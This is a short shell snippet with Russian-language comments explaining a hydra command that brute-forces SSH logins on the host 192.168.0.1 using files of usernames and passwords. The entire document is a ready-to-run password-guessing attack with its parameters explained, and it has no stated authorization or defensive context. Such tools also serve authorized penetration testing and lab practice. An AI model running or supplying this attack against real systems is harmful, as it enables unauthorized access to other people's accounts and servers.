# Команда для выполнения brute force-атаки с использованием hydra
# -----------------------------------------------------------------------
# Описание:
# Эта команда выполняет подбор пары логин/пароль для службы SSH, 
# используя список логинов и паролей, хранящихся в указанных файлах.
# Целевой сервер — 192.168.0.1.
#
# Параметры:
#   -L: Путь к файлу со списком логинов (usernames.txt).
#   -P: Путь к файлу со списком паролей (passwords.txt).
#   ssh://192.168.0.1: Протокол (SSH) и IP-адрес целевого сервера.
#
# Команда:
hydra -L ~/hydra_files/usernames.txt -P ~/hydra_files/passwords.txt ssh://192.168.0.1
